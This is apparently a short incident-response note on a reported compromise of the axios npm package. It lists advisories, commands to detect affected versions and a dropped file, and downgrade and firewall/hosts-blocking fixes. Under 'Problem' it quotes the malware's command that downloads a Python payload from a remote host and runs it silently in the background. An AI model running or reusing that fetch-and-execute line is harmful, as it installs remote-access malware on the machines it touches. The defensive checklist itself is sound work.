#########################################
axios remove version
#########################################

https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
https://securitylabs.datadoghq.com/articles/axios-npm-supply-chain-compromise/#linux-payload
https://www.youtube.com/watch?v=CHkiSSZiWVE
https://www.youtube.com/watch?v=o7NYXvYohYk
https://www.youtube.com/watch?v=eGSsoSEppNU
https://www.youtube.com/watch?v=yiLIZLPNEm8
https://www.youtube.com/watch?v=AT7x16mqGMc
https://www.youtube.com/watch?v=A58cV17avpM


find / -path "*/node_modules/axios/package.json" 2>/dev/null |while read f;do echo "$f -> $version"; done  

netstat -an | grep "142.11.206.73"




Problem:

curl -o /tmp/ld.py \
  -d packages.npm.org/product2 \
  -s http://sfrclak[]com:8000/6202033 \
&& nohup python3 /tmp/ld.py http://sfrclak[]com:8000/6202033 > /dev/null 2>&1 &


# Check

npm list plain-crypto-js

ls -la /tmp/ld.py 
ls -la /tmp/ld.py 2>/dev/null && echo "COMPROMISED"

npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4"
grep -A1 '"axios"' package-lock.json | grep -E "1\.14\.1|0\.30\.4"

FIX: 

# Downgrade axios
npm install axios@1.14.0   # for 1.x users
npm install axios@0.30.3   # for 0.x users 

rm -rf node_modules/plain-crypto-js
npm install --ignore-scripts  #  prevent postinstall

 # Block via firewall (Linux)
iptables -A OUTPUT -d 142.11.206.73-j DROP

# Block via /etc/hosts (macOS/Linux)
echo "0.0.0.0 sfrclak.com" >> /etc/hosts  
